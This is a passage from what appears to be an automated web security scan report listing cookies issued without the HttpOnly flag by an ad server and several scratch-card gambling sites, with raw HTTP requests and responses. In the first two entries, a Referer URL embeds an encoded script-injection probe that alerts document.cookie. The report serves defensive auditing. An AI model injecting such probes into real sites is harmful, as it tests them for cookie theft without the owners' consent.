OAID=10ca289019af23418475b1d5b7b65193; expires=Tue, 15-May-2012 12:52:09 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.tradex.openx.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg;pos=footer;sz=728x90;atf=no;name=leaderboardfooter;pageURL=www.metacafe.com%2Ffplayer%2F%3F4702d%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ebe96a23f3a3%3D1;studio=null;section=null;category=null;channel=null;rating=clean;hd=no;env=prod;branding=null;fbconnected=false;ffilter=true;referrer=null;LEID=40;tile=9;ord=4284276430058379

Response

12.101. http://d.tradex.openx.com/lg.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.tradex.openx.com
Path:	/lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=e60be527d0ee36a1d9d3d53bd7c584e6; expires=Tue, 15-May-2012 12:52:13 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lg.php?bannerid=7833&campaignid=2580&zoneid=4408&loc=1&referer=http%3A%2F%2Fad.doubleclick.net%2FN6707%2Fadi%2Fmeta.homepage%2FadminMsg%3Bpos%3Dfooter%3Bsz%3D728x90%3Batf%3Dno%3Bname%3Dleaderboardfooter%3BpageURL%3Dwww.metacafe.com%252Ffplayer%252F%253F4702d%2522%253E%253Cscript%253Ealert%2528document.cookie%2529%253C%252Fscript%253Ebe96a23f3a3%253D1%3Bstudio%3Dnull%3Bsection%3Dnull%3Bcategory%3Dnull%3Bchannel%3Dnull%3Brating%3Dclean%3Bhd%3Dno%3Benv%3Dprod%3Bbranding%3Dnull%3Bfbconnected%3Dfalse%3Bffilter%3Dtrue%3Breferrer%3Dnull%3BLEID%3D40%3Btile%3D9%3Bord%3D4284276430058379&cb=92acc323c9&r_id=b7d3130441279250d437d1e5dbea5016&r_ts=llah2x HTTP/1.1
Host: d.tradex.openx.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE
Cookie: OAID=e60be527d0ee36a1d9d3d53bd7c584e6

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:52:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=e60be527d0ee36a1d9d3d53bd7c584e6; expires=Tue, 15-May-2012 12:52:13 GMT; path=/
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

12.102. http://da.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://da.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_12=EncryptedUniqueVisitorID=BBFDDD60B27B560BD9F8970BEAFB9576&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:13:58 GMT; path=/
UniqueVisitorID=BBFDDD60B27B560BD9F8970BEAFB9576; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:13:58 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: da.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.103. http://da.karamba.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://da.karamba.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_27=EncryptedUniqueVisitorID=A8F6C2B6CEF5B63478AED95B09F2EE9E&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:24:19 GMT; path=/
UniqueVisitorID=A8F6C2B6CEF5B63478AED95B09F2EE9E; domain=karamba.com; expires=Fri, 16-May-2014 12:24:19 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: da.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.104. http://da.scratch2cash.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://da.scratch2cash.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_1=EncryptedUniqueVisitorID=DB22A1CF13A4E4246723822650A86F19&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:02:39 GMT; path=/
UniqueVisitorID=DB22A1CF13A4E4246723822650A86F19; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:02:39 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: da.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.105. http://da.scratchcardheaven.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://da.scratchcardheaven.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_8=EncryptedUniqueVisitorID=C13466F88A3C2E3F7EF40181A63E88A6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:33:44 GMT; path=/
UniqueVisitorID=C13466F88A3C2E3F7EF40181A63E88A6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:33:44 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: da.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.106. http://de.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://de.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_12=EncryptedUniqueVisitorID=4AC5C3DD290CC9374CADA3E9FBEDEE3D&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:32:17 GMT; path=/
UniqueVisitorID=4AC5C3DD290CC9374CADA3E9FBEDEE3D; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: de.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=1tkc3d3ftxfybx55a2wzek55; path=/; HttpOnly
Set-Cookie: LanguageCode=GER; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=4AC5C3DD290CC9374CADA3E9FBEDEE3D&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:32:17 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: UniqueVisitorID=4AC5C3DD290CC9374CADA3E9FBEDEE3D; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: LanguageCode=GER; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.107. http://de.karamba.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://de.karamba.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_27=EncryptedUniqueVisitorID=2A1881799ACDD7EA946C26947FFD682F&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:35:06 GMT; path=/
UniqueVisitorID=2A1881799ACDD7EA946C26947FFD682F; domain=karamba.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: de.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.108. http://de.scratch2cash.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://de.scratch2cash.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_1=EncryptedUniqueVisitorID=388748C1F7262AA76BF3603A585497C0&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:31:29 GMT; path=/
UniqueVisitorID=388748C1F7262AA76BF3603A585497C0; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:29 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: de.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.109. http://de.scratchcardheaven.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://de.scratchcardheaven.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_8=EncryptedUniqueVisitorID=AA70828418124DA51B8663347992C3C5&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:31:28 GMT; path=/
UniqueVisitorID=AA70828418124DA51B8663347992C3C5; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:28 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: de.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.110. http://el.karamba.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://el.karamba.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_27=EncryptedUniqueVisitorID=B283729EB6F5F870238B9E9540B5B5C7&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:32:17 GMT; path=/
UniqueVisitorID=B283729EB6F5F870238B9E9540B5B5C7; domain=karamba.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: el.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.111. http://es.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://es.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_12=EncryptedUniqueVisitorID=64782A228F974BACFC7F6F262E43ABE6&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:12:29 GMT; path=/
UniqueVisitorID=64782A228F974BACFC7F6F262E43ABE6; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:12:29 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: es.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.112. http://es.karamba.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://es.karamba.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_27=EncryptedUniqueVisitorID=A8390FBE79EEBAE99D501DC41ACC13EE&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:10:17 GMT; path=/
UniqueVisitorID=A8390FBE79EEBAE99D501DC41ACC13EE; domain=karamba.com; expires=Fri, 16-May-2014 12:10:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: es.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.113. http://es.scratch2cash.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://es.scratch2cash.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_1=EncryptedUniqueVisitorID=0B048888371F42A6FD0E38C9F2E9454A&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:20:44 GMT; path=/
UniqueVisitorID=0B048888371F42A6FD0E38C9F2E9454A; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:44 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: es.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.114. http://es.scratchcardheaven.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://es.scratchcardheaven.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_8=EncryptedUniqueVisitorID=94A1C2407036BBC289743D1C0069248E&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:34:59 GMT; path=/
UniqueVisitorID=94A1C2407036BBC289743D1C0069248E; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:34:59 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: es.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.115. http://fi.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fi.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_12=EncryptedUniqueVisitorID=3153576B5369B48DCBD5E871A054BE1B&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:20:15 GMT; path=/
UniqueVisitorID=3153576B5369B48DCBD5E871A054BE1B; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:20:15 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: fi.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.116. http://fi.karamba.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fi.karamba.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_27=EncryptedUniqueVisitorID=66554D0353AB8B09EEE1CC87E1812987&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:45:17 GMT; path=/
UniqueVisitorID=66554D0353AB8B09EEE1CC87E1812987; domain=karamba.com; expires=Fri, 16-May-2014 12:45:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: fi.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.117. http://fi.scratchcardheaven.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fi.scratchcardheaven.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_8=EncryptedUniqueVisitorID=E866F9AC47D8C2AEE178FD730FCA6C25&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:24:05 GMT; path=/
UniqueVisitorID=E866F9AC47D8C2AEE178FD730FCA6C25; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:24:05 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: fi.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.118. http://fr.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fr.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_12=EncryptedUniqueVisitorID=9C666BD06D3E98CB4BE6D10ED7B38C7A&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:32:10 GMT; path=/
UniqueVisitorID=9C666BD06D3E98CB4BE6D10ED7B38C7A; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:10 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: fr.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.119. http://fr.karamba.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fr.karamba.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_27=EncryptedUniqueVisitorID=25F075332F047D1B0CF607CCD7D249CD&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:11:03 GMT; path=/
UniqueVisitorID=25F075332F047D1B0CF607CCD7D249CD; domain=karamba.com; expires=Fri, 16-May-2014 12:11:03 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: fr.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.120. http://fr.scratch2cash.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fr.scratch2cash.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_1=EncryptedUniqueVisitorID=0C638717D7C21970D51ED74830A7E2D9&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:30:40 GMT; path=/
UniqueVisitorID=0C638717D7C21970D51ED74830A7E2D9; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:30:40 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: fr.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.121. http://fr.scratchcardheaven.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fr.scratchcardheaven.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_8=EncryptedUniqueVisitorID=5402E87C2984227C4B267200D292C2AC&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:32:13 GMT; path=/
UniqueVisitorID=5402E87C2984227C4B267200D292C2AC; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:13 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: fr.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=33f2gh45mw2dub45vfy4im55; path=/; HttpOnly
Set-Cookie: LanguageCode=FRE; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:13 GMT; path=/
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=5402E87C2984227C4B267200D292C2AC&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:32:13 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:13 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:13 GMT; path=/
Set-Cookie: UniqueVisitorID=5402E87C2984227C4B267200D292C2AC; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:13 GMT; path=/
Set-Cookie: LanguageCode=FRE; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:13 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:13 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.122. http://home.okscratchcards.com/AboutUs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/AboutUs.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:25 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AboutUs.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

12.123. http://home.okscratchcards.com/ContactUsMail.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/ContactUsMail.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:04 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

12.124. http://home.okscratchcards.com/FairPlay.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/FairPlay.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:28 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FairPlay.aspx HTTP/1.1
